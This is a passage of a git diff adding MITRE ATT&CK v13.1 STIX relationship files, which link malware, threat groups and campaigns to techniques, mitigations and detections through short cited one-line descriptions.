"created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "source_name": "Kaspersky Flame" + } + ], + "modified": "2019-06-06T14:35:54.017Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json new file mode 100644 index 0000000000000000000000000000000000000000..b89324a989e135d680749f5352a51b4269a73fa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ca73187d-3d68-4038-8774-ba9f23f1b23c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc", + "type": "relationship", + "created": "2019-11-27T14:58:00.679Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://technet.microsoft.com/library/dn221960.aspx", + "description": "Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.", + "source_name": "TechNet Scheduling Priority" + } + ], + "modified": "2020-12-30T14:26:44.885Z", + "description": "Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json new file mode 100644 index 0000000000000000000000000000000000000000..747eb937451faafaf077fd3350acb4f52be412b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--76b36ce3-1fa2-4807-b584-e8b56e180ad1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6", + "type": "relationship", + "created": "2021-04-01T21:13:03.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.", + "url": "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "source_name": "Cyphort EvilBunny Dec 2014" + } + ], + "modified": "2021-04-01T21:13:03.597Z", + "description": "[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)\t", + "relationship_type": "uses", + "source_ref": "malware--a8a778f5-0035-4870-bb25-53dc05029586", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json new file mode 100644 index 0000000000000000000000000000000000000000..5d9126eb6bc197d534ae3e7cd9a8976ed223e76d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--afa67681-fa67-4588-a698-9d6e377e9fa2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c4456d-cea9-43bf-913b-ec566699ce61", + "type": "relationship", + "created": "2020-08-20T18:47:28.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-11T17:38:16.986Z", + "description": "Limit permissions to discover cloud infrastructure in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json new file mode 100644 index 0000000000000000000000000000000000000000..f963719865c6ef4701ab6d1655b1b8e637b36e8f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--30ccff43-b487-4b2c-8dec-4aaae6119ff5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c61f2d-f55e-4257-b92c-682352feb37d", + "type": "relationship", + "created": "2022-03-30T14:26:51.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.850Z", + "description": "Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms.", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json new file mode 100644 index 0000000000000000000000000000000000000000..83b67a90cf37219c3b84fff1303712c7b5cce088 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b88fe80e-9e65-4107-b306-6236bef16358", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/", + "description": "Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.", + "source_name": "OilRig New Delivery Oct 2017" + } + ], + "modified": "2019-09-04T22:55:41.899Z", + "description": "(Citation: OilRig New Delivery Oct 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json new file mode 100644 index 0000000000000000000000000000000000000000..b5a61cfaa1ca7f70f69b61b6f62b1736d7ffb218 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--da96e4b4-8b36-450f-b582-bc12e30eff43", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09", + "type": "relationship", + "created": "2020-08-13T14:58:25.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "modified": "2020-08-13T14:58:25.315Z", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json new file mode 100644 index 0000000000000000000000000000000000000000..1f5a78aaf89fb123f9d24cc4245afe91b4ed5b32 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ca13909e-a677-47b3-bdba-3bf262565d76", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00d1f959-5469-4a9c-b33d-93f315719a6c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + } + ], + "modified": "2020-03-17T02:46:42.658Z", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)", + "relationship_type": "uses", + "source_ref": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json new file mode 100644 index 0000000000000000000000000000000000000000..482e524dd73ab2bd7d0f85409edb34458567db70 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b1612c4d-6668-47dd-b092-2e8699250fb9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8", + "type": "relationship", + "created": "2019-01-30T15:19:14.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/", + "source_name": "Unit42 Azorult Nov 2018" + } + ], + "modified": "2020-03-16T16:39:52.451Z", + "description": "[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)", + "relationship_type": "uses", + "source_ref": "malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json new file mode 100644 index 0000000000000000000000000000000000000000..cb1f9db05e3ab6c61292e2ff989e8c93de4c1721 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--dcebde79-5086-491c-b44f-b9bae18f77d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de", + "type": "relationship", + "created": "2020-12-29T19:13:11.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CISA AA20-259A Iran-Based Actor September 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "description": "CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020." + } + ], + "modified": "2020-12-29T19:13:11.251Z", + "description": "[Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) directly to endpoints.(Citation: CISA AA20-259A Iran-Based Actor September 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json new file mode 100644 index 0000000000000000000000000000000000000000..2901ac49537161baf6cc6e9f5f260405f56de9b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--59c459b2-fd13-45cc-b3b0-7df4e2fedb6f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c", + "type": "relationship", + "created": "2020-04-29T18:44:04.814Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos PoetRAT April 2020", + "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", + "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020." + } + ], + "modified": "2020-04-29T18:44:04.814Z", + "description": "[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.(Citation: Talos PoetRAT April 2020)", + "relationship_type": "uses", + "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json new file mode 100644 index 0000000000000000000000000000000000000000..deb5e12e2bfad2e1141c5948c4256618a1b9148a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--7e182112-e7fe-4cfb-a70e-0982b1eed0f7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474", + "created": "2023-03-26T16:19:45.553Z", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Secureworks IRON RITUAL Profile", + "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-ritual" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-26T16:19:45.553Z", + "description": "During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) created tokens using compromised SAML signing certificates.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Secureworks IRON RITUAL Profile)", + "relationship_type": "uses", + "source_ref": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "target_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..cf0456b3740caac18d3c60ea7429847c017d6b34 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--152ea9a5-b211-4958-8d09-a000b91c2a47", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00e99176-c74e-4f49-a498-c66a71612a5b", + "created": "2021-04-07T13:57:06.538Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Cobalt Strike September 2020", + "description": "Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.", + "url": "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf" + }, + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-30T22:37:12.371Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json new file mode 100644 index 0000000000000000000000000000000000000000..934a626485ee206fa663f671e7ffc7dd1a18b8dd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--bb3ace3a-c486-4a9f-97a9-73600696f332", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd", + "created": "2019-04-12T17:01:01.266Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016." + }, + { + "source_name": "Novetta Blockbuster", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)", + "modified": "2022-07-28T18:55:35.993Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json new file mode 100644 index 0000000000000000000000000000000000000000..1e40020105c0e50dcb3fe45a5b5c3d3dbbeb00df --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--d010f073-2db0-4a30-93cd-95685efd66f0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a", + "type": "relationship", + "created": "2022-01-11T14:58:01.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Prevailion DarkWatchman 2021", + "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/", + "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022." + } + ], + "modified": "2022-01-11T16:03:19.390Z", + "description": "[DarkWatchman](https://attack.mitre.org/software/S0673) can identity the OS locale of a compromised host.(Citation: Prevailion DarkWatchman 2021)", + "relationship_type": "uses", + "source_ref": "malware--63686509-069b-4143-99ea-4e59cad6cb2a", + "target_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json new file mode 100644 index 0000000000000000000000000000000000000000..f1431aea3c4841b201c80c789fb3d48ccc27c7b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9ab8ac48-e519-40ad-91e4-a8aea5343cf0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00f4c60b-36c4-4ec5-affd-38f89687d957", + "type": "relationship", + "created": "2020-08-11T21:15:35.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "modified": "2020-09-02T21:40:20.748Z", + "description": "[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json new file mode 100644 index 0000000000000000000000000000000000000000..7c959919e47f1be45eb687e17510970109d02bec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--2292ec93-d40a-4265-afb5-4a155b67911d", + "spec_version": "2.0", + "objects": [ + 